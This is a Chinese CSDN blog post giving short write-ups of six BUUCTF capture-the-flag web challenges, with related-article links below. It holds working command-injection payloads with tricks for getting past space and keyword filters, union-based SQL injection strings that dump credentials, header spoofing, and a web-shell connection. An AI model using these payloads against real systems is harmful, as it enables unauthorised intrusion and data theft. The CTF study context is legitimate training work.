BUUCTF

最新推荐文章于 2024-07-12 23:54:36 发布
最新推荐文章于 2024-07-12 23:54:36 发布
阅读量53 收藏
点赞数
文章标签: php 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyw260187453/article/details/130303902
版权

BUUCTF

文章目录

一、[GXYCTF2019]Ping Ping Ping

在这里插入图片描述
使用ls命令
在这里插入图片描述
有个flag.php
cat flag
在这里插入图片描述

过滤了空格
linux下对空格的绕过方法:
1. I F S 2. {IFS} 2. IFS2.IFS$9 9 可改成其他数字 3. < 4. < > 重定向符 5. c a t , f l a g . p h p 用逗号 , 实现了空格功能先用 9可改成其他数字 3.< 4.<> 重定向符 5.{cat,flag.php} 用逗号,实现了空格功能 先用 9可改成其他数字3.<4.<>重定向符5.cat,flag.php用逗号,实现了空格功能先用{IFS}
在这里插入图片描述
被过滤了
$IFS$9
在这里插入图片描述
flag被过滤了
看看index文件

这个可以使用拼接绕过
构造payload:

/?ip=1;b=agcat$IFS$9fl$b.php

在这里插入图片描述

二、[SUCTF 2019]EasySQL

万能密码不行
堆叠注入
1’;show tables;
在这里插入图片描述
1;show columns from Flag#
不行看别的博客学到了
1、mssql中||表示连接操作符,不表示或的逻辑。
2、设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用//就是将||的或转换成连接符
在这里插入图片描述

三、[极客大挑战 2019]Secret File

在这里插入图片描述
看看源码
在这里插入图片描述

进去看看
在这里插入图片描述
点击直接跳转
在这里插入图片描述
抓个包看看
在这里插入图片描述
访问
在这里插入图片描述
直接使用php伪协议读取
在这里插入图片描述

四、[极客大挑战 2019]LoveSQL

万能密码试一下
在这里插入图片描述
存在注入点
联合注入

1' union select 1,2,3#

在这里插入图片描述
查数据库

1' union select 1,database(),3#

在这里插入图片描述
查表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'#

在这里插入图片描述

查看l0ve1ysq1中内容

1' union select 1,group_concat(id,username,password),3 from  l0ve1ysq1#

在这里插入图片描述
拿到flag

五、[极客大挑战 2019]Http

在这里插入图片描述
抓个包
在这里插入图片描述
访问
在这里插入图片描述
来自这个网址加一个Referer:
在这里插入图片描述
发现响应信息提示:Please use “Syclover” browser,即需要增加User-Agent
在这里插入图片描述
加一个X-Forwarded-For: 127.0.0.1

    X-Forwarded-For 是一个 HTTP 扩展头部,用来表示 HTTP 请求端真实 IP。与之相关的有X-Real-IP、 $remote_addr。

拿到flag
在这里插入图片描述

六、[极客大挑战 2019]Knife

在这里插入图片描述
蚁剑链接
在这里插入图片描述
根目录下拿到flag
在这里插入图片描述

Delancey.
关注
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF题解
qq_51175992的博客
05-27 4541
BUUCTF题解,主要包括CTF中的Crypto、Misc方向,其中一些题目的解法参考了其他博主大佬的思路。这个文章主要是用于自学和提供思路解法,会不定时更新
BUUCTF 相册
qq_45317844的博客
03-21 243
jadx打开安装包。
Buuctf Http
Dexret的博客
12-07 2291
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
BUUCTF Crypto
qq_74388419的博客
04-26 623
Crypto
BUUCTF相册
Itach11_的博客
06-15 200
提取文件,发现是apk文件,用jadx打开,根据题面,flag和邮箱有关,在jadx中搜索mail,发现一个mailsendbyjavamail函数,发现mailserver,就是我们需要的邮箱, 他是so文件经过nativemethod函数返回的值(好像是这么个意思,我也是看了wp才知道),这里有三个字符串,用ida打开so文件,找到这三个字符串,发现三个可疑的字符串,base64解密,得到一个邮箱,即flag.
BUUCTF LOVESQL
ANYOUZHEN的博客
05-16 485
打开网页后,利用hackbar,先来查询他的列数 1‘ order by 3# 试了1,2,3,4都不行,初步判断#是被后端代码过滤掉了,我们试试--+,和#的效果是一样的 但是当我尝试使用--+后发现仍然没有反应,说明后端代码也过滤掉了--+,我们采用另外一种方式,使用%23 当我把3改为4时,出现了,说明列数为3,接下来好办了,老套路 使用联合查询:1’ union select 1,2,3 %23 2,3有回显,说明2,3存在注入点 找数据库 ?username=1.
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
PHP编程开发工具有哪些?
Pythonit教程网
07-10 980
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
Laravel Excel导出功能:高效实现数据导出
liuxin33445566的博客
07-08 1181
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 354
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 212
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。
三级_网络技术_14_局域网技术基础及应用
最新发布
2301_80961833的博客
07-12 203
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
Vulnhub靶场DC-6练习
Reset
07-08 972
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
网关、DHCP协议、ip地址、子网掩码简单介绍
mantouyouyou的博客
07-11 1202
参考文章:https://baike.baidu.com/item/%E7%BD%91%E5%85%B3/98992?fr=ge_ala。
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值